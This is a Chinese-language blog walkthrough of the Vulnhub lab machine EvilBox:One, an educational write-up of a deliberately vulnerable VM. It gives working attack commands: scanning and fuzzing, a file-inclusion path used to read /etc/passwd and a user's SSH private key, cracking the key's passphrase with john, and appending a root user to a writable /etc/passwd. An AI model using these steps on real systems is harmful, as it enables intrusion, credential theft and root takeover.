首页 > 其他分享 >Vulnhub: EvilBox:One靶机

Vulnhub: EvilBox:One靶机

时间:2023-07-02 15:56:03浏览次数:36  
标签:.. etc passwd 192.168 EvilBox -- Vulnhub 靶机 111.130

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

secret目录爆破

feroxbuster -k -d 1 --url http://192.168.111.130/secret/ -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x php,bak,txt,html,sql,zip,phtml,sh,pcapng,pcap -t 1 -e -C 404,500

image

漏洞利用

测试后发现evil.php存在文件包含

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 192.168.111.130/secret/evil.php?FUZZ=../../../../../../../../../../../../../../../../etc/passwd

image

包含/etc/passwd,发现mowree用户

http://192.168.111.130/secret/evil.php?command=../../../../../../../../../etc/passwd

image

包含mowree用户ssh私钥

http://192.168.111.130/secret/evil.php?command=../../../../../../../../../home/mowree/.ssh/id_rsa

image

通过私钥登录需要密码,利用john爆破

ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

image

image

image

提权

/etc/passwd可写

image

写入用户提权

openssl passwd -1 -salt a a
echo 'a:$1$a$44cUw6Nm5bX0muHWNIwub0:0:0::/root:/bin/bash' >> /etc/passwd
su a

image

标签:..,etc,passwd,192.168,EvilBox,--,Vulnhub,靶机,111.130
From: https://www.cnblogs.com/ctostm/p/17520860.html

相关文章

  • vulnhub靶场:EvilBox - One
    下载地址:https://www.vulnhub.com/entry/evilbox-one,736/kali:172.88.6.144靶场:172.88.6.94 nmap-T4-sV-P-A172.88.6.94  用dirbhttp://172.88.6.94和 dirsearch-uhttp://172.88.6.94/ 发现类似的网址  dirbhttp://172.88.6.94/secret/-X.php,......
  • vulnhub靶场:Deathnote
    靶场地址:Deathnote:1~VulnHubKali:172.88.6.144靶场:172.88.6.92arp-scan-l nmap-T4-sV-P-A172.88.6.92  访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpress/页面,但是显示404,想着应该是未配置dns的问题。那就配置下dns信息,win:打开C:\Windows\Syst......
  • vulnhub靶场:doubletrouble
    靶场地址:doubletrouble:1~VulnHubkali:172.88.6.144靶场:172.88.6.89靶场2:172.88.6.91arp-scan-l  nmap-A-sV-T4-p-172.88.6.89 访问ip 使用dirsearch对目标站点进行Web目录爬取dirsearch-uhttp://172.88.6.89/-e*   将图片下载好,放到kali中,自......
  • VulnHub-DC-7渗透流程
    DC-7kali:192.168.157.131靶机:192.168.157.151信息收集nmap-sV-A-p-192.168.157.151虽然有robots.txt等敏感文件泄露但是用处不大,但在网页底部有@dc7user搜索一番,在github找到了他的项目,在config.php内得到了登录用户与密码$username="dc7user";$password="Md......
  • Vulnhub: DarkHole:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标web网站,注册用户注册时尝试注册用户名为admin的用户,发现存在该用户进入用户后台,利用burp抓包越权修改其他用户的密码admin用户密码......
  • VulnHub_DC-6渗透流程
    DC-6kali:192.168.157.131靶机:192.168.157.150修改host文件,添加192.168.157.150wordy不然解析不了域名信息收集发现是WordPress5.1.1,探测一下用户,使用wpscan对其用户进行枚举wpscan--urlhttp://wordy/--enumerateu另存为user.txt扫一下目录找到登录界面访问http......
  • vulnhub靶场:Thales
    靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat  useauxiliary/scanner/http/t......
  • Vulnhub_Broken_WP
    前言靶机下载地址-->https://www.vulnhub.com/靶机探测nmap-sn192.168.20.0/24192.168.20.140是新出现的ip详细信息扫描nmap-A-p-192.168.20.140这里可以发现nmap已经扫到了一些网站目录,一个说明文件和图片漏洞扫描nmapnmap-p22,80--script=vuln192.168.20.......
  • vulnhub之VulnHub2018_DeRPnStiNK
    一、信息获取1、tcp开放端口获取─$cattcp_open_port.nmap#Nmap7.93scaninitiatedSatJun2416:48:232023as:nmap--min-rate10000-p--oAtcp_open_port192.168.62.198Nmapscanreportfor192.168.62.198Hostisup(0.0014slatency).Notshown:65532clos......
  • vulnhub靶机练习:01-Empire-Lupin-One
    这次用的是OracleVMVirtualBox,避免用vmware出现的问题靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/arp-scan-l  扫描ip kali:172.88.6.144靶场:172.88.6.63/1、扫描ipnmap-A-sV-T4-p-172.88.6.63 1.1尝试访问ip 1.2目录扫描    d......